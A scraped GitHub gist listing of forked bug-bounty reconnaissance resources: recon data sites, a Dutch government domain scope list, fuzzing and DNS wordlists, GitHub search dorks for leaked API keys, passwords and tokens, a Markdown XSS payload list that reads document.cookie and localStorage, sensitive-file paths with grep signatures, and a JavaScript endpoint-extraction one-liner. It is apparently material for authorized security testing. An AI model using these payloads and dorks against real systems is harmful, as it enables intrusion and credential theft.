- https://scans.io/
- https://commoncrawl.org/
- https://web.archive.org/ (For JS snippets this can be extremely handy. See killbox.sh below that was written for a HackerOne event.)
- https://www.shodan.io/
- https://opendata.rapid7.com/
- https://www.virustotal.com/en/documentation/public-api/ (You can fetch previously-scanned URLs via the API.)
- https://securitytrails.com/
- https://threatcrowd.org/
- https://dnsdumpster.com/
- https://crt.sh/
moodiabdoul3
/ DutchGov.txt
Created
August 26, 2019 00:53
— forked from random-robbie/DutchGov.txt
Dutch Gov - bug bounty scope - feel free to add more if you know they are in scope
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0800-8051.nl | |
| 0900-8844.nl | |
| 09008844.nl | |
| 112test.nl | |
| 1813-2013.nl | |
| 1meter35.nl | |
| 2013russiaholland.nl | |
| 247bz.nl | |
| 8000488.nl | |
| 8007000.nl |
moodiabdoul3
/ List of API endpoints & objects
Created
January 7, 2020 23:15
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
moodiabdoul3
/ a-recon-services-list-for-liveoverflow.md
Created
January 7, 2020 23:16
— forked from EdOverflow/a-recon-services-list-for-liveoverflow.md
moodiabdoul3
/ github-recon
Created
January 7, 2020 23:17
— forked from yassineaboukir/github-recon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| “Hackme.tld” API_key | |
| “Hackme.tld” secret_key | |
| “Hackme.tld” aws_key | |
| “Hackme.tld” Password | |
| “Hackme.tld” FTP | |
| “Hackme.tld” login | |
| “Hackme.tld” github_token | |
| “Hackme.tld” http:// & https:// | |
| “Hackme.tld” amazonaws | |
| “Hackme.tld” digitaloceanspaces |
moodiabdoul3
/ Markdown XSS fuzzlist
Created
January 7, 2020 23:18
— forked from yassineaboukir/Markdown XSS fuzzlist
Source: https://github.com/JakobRPennington/InformationSecurity/tree/master/Payloads/md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Basic](javascript:alert('Basic')) | |
| [Local Storage](javascript:alert(JSON.stringify(localStorage))) | |
| [CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive')) | |
| [URL](javascript://www.google.com%0Aalert('URL')) | |
| [In Quotes]('javascript:alert("InQuotes")') | |
| ![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad')) | |
| ![Escape SRC - onerror]("onerror="alert('ImageOnError')) | |
| [XSS](javascript:prompt(document.cookie)) | |
| [XSS](j a v a s c r i p t:prompt(document.cookie)) | |
| [XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) |
moodiabdoul3
/ vuln_list.txt
Created
January 16, 2020 02:14
— forked from Lopseg/vuln_list.txt
150 vulnerability types that you can submit for. Thanks to @thecybermentor and hackerone.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Account Hijacking | |
| Allocation of Resources Without Limits or Throttling - CWE-770 | |
| Array Index Underflow - CWE-129 | |
| Authentication Bypass Using an Alternate Path or Channel - CWE-288 | |
| Brute Force - CWE-307 | |
| Buffer Over-read - CWE-126 | |
| Buffer Underflow - CWE-124 | |
| Buffer Under-read - CWE-127 | |
| Business Logic Errors - CWE-840 | |
| Classic Buffer Overflow - CWE-120 |
moodiabdoul3
/ all.txt
Created
January 17, 2020 22:02
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
moodiabdoul3
/ short-wordlist.txt
Last active
February 29, 2020 16:42
— forked from tomnomnom/short-wordlist.txt
short-wordlist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /.s3cfg | |
| /phpunit.xml | |
| /nginx.conf | |
| /.vimrc | |
| /LICENSE.md | |
| /yarn.lock | |
| /Gulpfile | |
| /Gulpfile.js | |
| /composer.json | |
| /.npmignore |
moodiabdoul3
/ Grep-For-Sensitive-Files
Created
February 29, 2020 05:45
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /.s3cfg | grep -Hnri "website_endpoint" | |
| /phpunit.xml | grep -Hnri "<\phpunit" | |
| /nginx.conf | grep -Hnri '/var/run/' | |
| /.vimrc | grep -Hnri 'vim-' | |
| /yarn.lock | grep -Hnri 'yarn lockfile' | |
| /.idea/workspace.xml | grep -Hnri '<project version="4">' | |
| /composer.json | grep -Hnri '"autoload"' | |
| /Homestead.yaml | grep -Hnri 'provider: virtualbox' | |
| /Vagrantfile | grep -Hnri 'VAGRANTFILE_API_VERSION' | |
| /.ssh/known_hosts | grep -Hnri 'ssh-rsa' |
moodiabdoul3
/ ejs.sh
Created
April 25, 2020 10:32
— forked from gwen001/ejs.sh
onliner to extract endpoints from JS files of a given host
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu | |
| # debug mode and absolute/relative urls support (the best one): | |
| function ejs() { | |
| URL=$1; | |
| curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d |
OlderNewer